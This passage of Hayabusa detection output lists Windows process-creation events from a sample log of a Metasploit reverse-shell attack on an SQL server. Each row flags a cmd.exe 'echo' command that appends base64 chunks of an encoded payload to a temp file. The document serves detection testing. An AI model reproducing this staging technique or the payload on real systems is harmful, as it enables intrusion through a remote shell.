Bcz/AUgAOUX8cw9OOQbdi038QTvIiY3ncvGLRdCFwJyE/QEAAMpF+w/p1N2UAIXA0x+LUwSLA411/IPDCAGNdbpWUWoDUi8ZoUMAAINaS+sug/gtdBA1+AJ1C4PDBDPAZos2/OsFiwP1w0SNVfxSjVWsUlFqMavoU6AAAIPEFD1Ki0XkhcB0J2JF8I1I00j5AOwAAHIFuP8BgQAWdcpzD07GBu2LTfxBO8aJz/xy8YtF1IXAD4RkAu1ogD4wD4RbAgAATsYGMOlLNwAAhcB1qYtTBLYDjXX8g8MIVhp1UVZRagRSUOg1EAAAg8QY6y6DpAF0EIP4AnULg8MEM8D4i9D86wWLAwa7BI0N/FKNVaxgUWoEUOg5NgBmg8Sxi/D4ReSFoXQNi0XwH0gBgfkAAs1TcgVQ/wEAADnqhXMPTsYGMIsv/EHjyIklA3Lxi0XUhcAPgsYBAACLRdhoDQ+EuwEABItVIE5OilGIRgHGBs2LRZGD3QJYoAHlRYszg8MEhXYPpsgDAAAgReSFwHUYV/6Dyf8zwMZFF6XyrvfRSYlN/Ol3AQAAi7TwM9KUyYvGiVWWD4ajAwAAgDgAD7qaA5kAQEI70YlVmrbuxkUXIOlKAQCM3QOLReTowwjdXbSFwLgGPpsAdEW3RfCNVfxSjdet/f//Uo1k0FKLfLhQi0XUUH9FQJpQUeiiMwAAi5yLRaqDxCCFwHQ8xkX7LengAAAAi0XEhcB0CcZF+yvp0IKT+O5FPIUSD4ThAAwAxkU1INm8AAAAi2LkhYtjQLgGAAACNxZFRfCFwHUIuAEAAACJRfCdTcSNla2Nlf84A1GDwwhSUPbsCN0cJOjgBQA2i/CD7BSAJi11B8ZFeS2q6xiKRSp4wHQGxkX7K+sLi0Ughed0BFAAcSAE/oPJGzbA766LRdT3iEmFwIlN/GIiky7X/xV8EkAAg8QIhcB1EotF/MYEfy6LRfxAokX8xgQwAPTZEGI5R3UTamXt/xV8wUCEg/EIhcCiA8YARYoh+4TAdByB/vrCQABOFNtFBzvwdA0NZ/sjiA6pRfxAiUX8i0XMhcAP3AEDAACDfcCcD4X3AgAAi1Xgi/0YO4cPfukCABOAfRcwD4V+AgC2ikVfhMAPhI6pABicRXuLfQyFwHRoO2fccnZXiQf/VQjCxASbwBTmjAMAAItPBIuaQ9jckxaIEJKJRfSLVeyLTeBC5IlV7ItV/NfkhlX8jkPg0kkCAACKQoPDBIhz6o116sdF/GgAAADLRRcg6f7/9f/GkOoljXXqx+n8AQAAAMZFNSDpS///w4PDBIXAdU2LReyLS/yZiQHHY7wAAAApiVEESNn///8g+EB1aItT/ItF7MdFvAAAg9WJAukT////g/gCdRaLS/xmi1Xsx0W8AAAAAGaJEen4/v+pi0P8i03sx0UGAAAAgsoI6eT+CP+L/K2xiUUQigBQsciD+XQPh2OLAAAzwtKR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ATB1Bk+chcl/9Il9EEldDIXbD4znAAAAi8srz4P5BA+PsAAAAIXbfzuAODB0BMYTLquF230u/8u4rzAViffZiU0Mi9GLPR2NAvOri8oe4QNOqot9EBHCi1UU1dgD8ItF+IldDLkBe/oAOyF8EooQiBZGQG3LSe7GnQ5GQTvPOu2LVRQ7un0iK9+ZMDAwMItgiyyL0cEvAmSGi8qD4b8Da5GqSwYwi1UURopG/1s8pw+FlwAAAP06GIXA8l8PhYwA7gBzRv/sX1GL5V3Kg/v9D41Q///uS0aJXQySEIhWDkDGui5Gg/8BfgpPigiIDjJ+T3X3xuplRrjbfb7328YGLXkDxgYrc8O5ZAAAMqP3+UaFwIv6fgUEMIgGRovDuQreAABi9/mFGyfKfs64Z2ZmZvfvwfoCi8LB1h8D0J3CMIgjTIDqMIgO6Rb//9uLwsYGANnQi+VdHZCQVYvsi0Uci00Yi/0UUItFEGoBUYtNDFKLVQhQUVLoDgDupYPEHF3DkJCQkJCQkOIkVYvsg+wUg30QT3wHx0UQXAAAAN1GCNwdMNxAAItNGFOLXfdWM/YMA+CJdfyJMfbEBYv7Yg7dRQjZ4N1dCMcBAQBfACFNDItVCH/j7FBRUiEVGMFAAN1dCN1F7NwdMMIRAIPEDN/g9sREe3KNc1A7PXZYFEXs3B0wwkAAWeD2xERMSFDd7NwNEMNAAI3m7N+D7AjdHCT/FRjBQAC1XfTdRfTcBQjDQACDxAxO3A0Aw0A36No1AADqNp+xMCrIiA6LTfxB5PMtTfx3qI1D9zvw2qyKFogXR0Y78HIG61DdRQjcHXfCUADf4CUZQQAAdcHdx33cDa/CQADdVawXwNwdKPucAIng9sTkeiHdVeMuDfjCQEsL2cDcHSjCQADf4PbEBXum3V30iVz86wLdUotY9Y00GItFHIXAdW0DdfwdTRTF83Pri0UQiPfYiQHGAwCLKV5b+uXuwyEb/GT+iRF3PN1FCI3XUDv4czBPDfjCQACNY/RQg+wIvv8k/xUYwZkA3UVGg4AM6AU1AACLTRSLXcsEMIgHRzv+dsndZyZTUCuncg2YxkNPAIvwXltGxV3DghZ8bYC9bIBOOYgWfs6LVRE7gsYGPMYFTv5s677GBjGLzkeF0on6dQg7w3YDxgA2QGM+MH8zxgBEX4vDXluL5dPDkJCQkJCQkJBjkJCQkJBVi+yLRQyLMUVTVleLfRSrwPL3dDOLRRDHAAAWAADrEov9EDPAhckPnMCFYokCdAL32arNzMzMs41R4cHqA4rCTpjrS8iAwWycDgukhdJ1LYtFGDX+iTiWxl9eW13DkJBVi+yLRQyLVRDGi112V4v0GIXAdw1y9IP7/3cEbcl1IWpnFzR8CIH7////aHcqCfj/fLR/CIH7AACtgHIbhcmOG4ueHF9VFFBXUmRT6ML/He+DxMhfWyLDhcl0C+9NFMcBAJ8m3iwjhcB/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo /LSvBYP4/x8bi1UcUovQGFKLVRRSUVDo6Av//4N6FF9eW2Hqi8hOI8+KDBmIDktNEOgdMgAAi8gLynXorEUY/FUcK8ZfqAKLxuVbXa6QoJCQkJBVi4KLTRCLRWWLVQzEyQBSaiJqBFDoFv///4PEFClKkFWL8YPsCFaLdQy3KnUIiXX4iXX86w2LRQiJ3/iNREb/iUX8rVUQjZgUUY0LjVRQaNCGQO3oxJyp/4X2dAZ+TfjGAQCD+P91A/l6/16LRF3Dg8j/w5C3eeiQkJCQkJCQhPuLvYtFCD0gURUAfRWLTRCLVUFR71DohQMA9oPEDF3CDAA9wNSMAH0bUOiRWAAAI00MUIus0lC0SWMApwCXxBBdwqzEPdY5CgCYnItVkotFDGhU+RQAUrroQwAAAIPEDF1hDAA9gD0KAH0Zi00QiwUMaFT5QABRUigjAIUAg8QMXcIMAItNDPOAnwL/FYswEFBR5VkCAACDxAxdwgwAkJBVi+yLRQxXTRBWi3UIUFFWkbsdAADsxl4qw5CQkHmQkFVE7It/GD1xEQEAE4/DAAAAD9G2AJ7aBd5V/wN8+AAP5zcBAAD/JA0EiUAAuIQAQQBdQLhgAEEArZa4QABBGV3puLZuQb9dwyPk/0AAXcNhtP9AAF3DuIj/QAClw7is/0AAXRi4IP9AOF3luPD+fgBddua0/kDLXcO4jP5AAF3DuHz+QGNdw1RYB0AAXSe4LP6HN6jDuBA4QABdw6j0bEAKXc241P1AOF3DuKxeQABdw7hs/UDYXcO4PP1A/l3DuBz9QABdw7gM/UAAXcO4wPxAAF3TBY5O/v+D+BZ35/8qhWyJQAC4cPxAAF3DuEj8l6tdEZwg/NgAXcPM8PtAEV3DuLxCQABd2YeXU9HNXcO4YPu5wF3DuDj7rgBdw7gA+0AAXcO47DxAAF3DLLz6QABmF+SQ+kAAXYu4ZPpAAF3DuDT6QABdw7hB+UAAXcO4tPlAAF3D2Jz5QABdw7iV+VMAXcOQzIdAAPyIQLfTh0AA2mZBAHf3QADoh1tR7w5AAPaeEwD9h8+TBIhA3guIQADliEAAYIhA/SKIFNcniEAALohAAIWIyAAgiEAANYiIANeIQAATiEAASohAAJcLzgBYiEAA/Igap1+IqgOFiEAAjIVAAJOIQACaiED0oYhAj6iIQACviEDx/IhAAJ2IjwDniEAAtohAAL1gQADwiEAAy4j2APyIQAD8iEwA/IhAANKIQADZiGUA4IhAADWIQADuiEDQ9YhTqZCQkJCQkJCQMYtksotdDKzMdQhXi33NaqlTVmgABHYACRsAaAASAAD/FZTA8gCFwHX+QQ2Kw0DRhakMWzk8xRjDQAB0DosmxQ3DQIIshcmL6+tEiwTFHMNAAFNQPHYmGwDai/6DyawzifKu9/BJi8Ewq4VwrDGKXjD/uK/5DXQFgPkedQTGBEgga8B16YvG6F5pXfyLfStX>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wjvCD4R1////CU6hgEX8asZQagRo/0EAFVH/ALjBQACD+P/768oBAACLRRAlwItGOCcODBAURt8zwF6L5V02mwAk74lGODPAXovlXcK0AIt1CPLJOkI4TOJ0gPoID1bBzchzhBb/sf+FwHQXiwhBUujS/P//g8QEhcB0G16L5V15DIuLRgRQ6JH8//+DxASFBNiFpQEAAItFEIWqi6quw+eTCIlGODPAXovlXQMM3iVOiUY4M8BeyOVdwgwAi3Vci044g98BFMmwfxvJQTtp0ISp/v//jVWbagRmiXcItkYEUmiAAAAAaP/gAAB+ZsdFCh4A/xW4DkAAg/j3D4SQAAAAi0UQhcCLRjh0DgwYiUY4M55ei+UWXgwAJP6JRjgzwF4l5V3CDACLVUyNTRBqBFGL9gRFARAAAGj//60AUP8VuMFAAIP4/w+CMP6+/+tigfkAQAAAf49qSwAADxjvAAAAgfknSAAAD4SNAADEgfkAAgAABoWxAAAAi46/M9KETjiB4QACAACx+dACAOaXlMI70A+E5f2q/4tOBI1FEGoEUGqFagZR/xW4wUAAg/j/dSGL59jBQAD/1oUadQdeZeVdwhvk/9YFxhgKAF6LB11CmwCLQBCFwBFEOHQPqswCiUY4M8Bei+VdwgwAqeT9iWI4Mwpei+VdwgwAi0UIXlVtapZSi0gEaAIQAEFt//8IwQf/orjBQACD+P8P/V39/7Try4H5AIAAAOAMuBbrAABei+9dwgwAfZxoLSBeiwJdwgwAi/9wj0AA7Y1AAEiOQAACjxgAo479Z96QQAAAAQUCBQUFAwXABQUFBQUEsovs2uwEX9EQi00MVldQjVUiUVLotdn/l4tFPItNCEG+CgCNAIoUhdjEAACNBBTYxEAAiFH/QEGKEIhR/4oXAYtV6IjYQY0ElbTEQADGAUtBABCIEYpQAUFAIRGKQAFBiAGLReSZ9/4dxgEgQQQwdMIwiAGLReBB3Y9Bmff+xgF8QQROjMIwiAGLZ9z5iBEqYcz+CgE6QQQwgMINiAGLRdhBiBFBmfdztQE6QQQwgMKRiAFBiBFBi1Xsv+gDAADGASBBqG9xmwAA/8aZ9//CZAAAxgQwiAG4H4U8UffXwfoFi8JBwegfA9CL9YDCMIgRQZmZ/7hnZuVm7ffqHIkCi+TBpR880IvGgMIwvgoADwCIEUGZ9/5egMIwBsCIEcZBAQCL5V3CDACGlpCQCZCQkFWL7FOLXRBWfIv78XU0M8CLdQjyrvd/gfn4AAAAiU1cjmuKU6SA+jp1oopDAhMvdAQ8XHUaaODsQQBW/3gQwlIAvEUMg8QIg+gEg8bR6zuKAzwvdAQ8XMA0gFYvdAUQ+lx1ioB7Ajp0JIPpAmjMAEEAVoPDAolNEP8VEAJA3FhFDIPECLWECIPGEIlFDI1FDI1NM1BWUVOstBYAAIXAdBs9eIlBAHXDX164FgC5AFtdw4tFEIXA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dAruXrgmAAAAW13DZov6Z4XAdPdmPS8AdQWZxwZcgWaLeQL+xgJm/cB16TPAX/4hXfCQkJBzkJCQkFWL7FaLVwhXwP9RzAT/EISEAAUAikbChMD7CFbobx/eAIv4i0YYJQDTBAZ0Wj0AAAAGdRdqE/8VCMFA6oPEBGr/efSpFaTAQADrRowAAABedRdqAf8VCMFaAFeMBE3/1fX/FaRjQADrKD0AAHsCdaNqAP8VCMFAAIPEBGr/avb/FaTA+QDrVotGBFD/FXTdQEjBRgT/////i0YMhcB0FYtAEIXAdJ5Q/xV0wEAA80YQAAAAAIvHX15dw5CQMfYTkOug7LhBQAAN6M8kAABTi10QzVcz/8dFUI0AAAD2wwGJffx0B8dF/AAAAIB3wwJ0B4FND6IAAED3FwQAAAh0CcSbUYDMAYlF/FAN3L/9AIO5Hj0Ix0X4BwC/AIvDg+AEdmtww0B0B9EBAAAA6yKKbIDiPfbaG9KD4v6HwgTrD4rTgD4Q9tob0oPiAoPCA4vy9sNAdBKFwHVzX164DQAAAFuL5V3CMwD2xwF0Bb8AkhYE98MAIyAAdFmBzwAAIAD2ygP8gvfDDQAQAA5Pg/kerQaBzwD0AAL3wwAAQAB0ByZN/AAAAgD2VQJ0BoHPCgAAQIP5U3wH9sc+dAmAzyiBzwAAAEiLRUgkjfi///9laAAgAABR6FK9//+DxAzhwA+FkVMAt8hV+FBXVlCLo1M8jXr4Qf//UFH/FbDZQADrG4tV+ItV/ItNDGoAV1ZqAFK4Uf8VrMBAAIDnmsD4/4lFlXUgmDVtwEAA/9aFwA+ErAGzAP/Wb14FgPwKAFtPqPrCtACLVRjOYFLo1LT//4t1CIv4M4qLF7kYqQAA86tVfRiLTRCJFk46i1UMiwZSVyLNBOibwv//i5SJQSCLGYPI/4laGIsO38MIiUEQiUEUixaJQjB0G4sGagJqAGoAx0A0AQAAAOcOi1EdUv8VqMBAAITbeR8gBmgAEAAAV8ZGLAHoXLRo/4sOiUE4TBbHQkAAEACBiwaKSCyEyXUHi3mCCMl0PFeDwFiwAFDosgsAAIXAj0UMdCmLBlDo+v26RoPEBIW4dQ6LDmi1k6gA0FfoTr8UPItFDF/kW2LlXcIUAIM93AhBADLIFov2i0iwhO1RDbITSgAAAIPEk4XAdAuLwItIGIDlBIlICe0WcABXvcJcavpm6Hih///Kx/RvFYs2aCByQABoQIRAAFaLBlDoTmH//zPAX15bLuVdwhQA3pCQVXLsgwZqVot1CI1FyMdF/AAALACLjwRQUf8VvMCMAIXTdA+LRcj2xAJ0BzPAXovlXcOLRgyFwHQRAUAIAAAAAItWi8dCDAA4AAB/RgyLVgRXjU36UFFqGWoAzwBqAGjEAAkAUv8VTsBAAIXAZpVfM8CIi+Vdw4s9mMCujM3Xg8B1Bl/vi4Fdw//XBYD8CgA9ZTsLAA+FsgAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9zABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1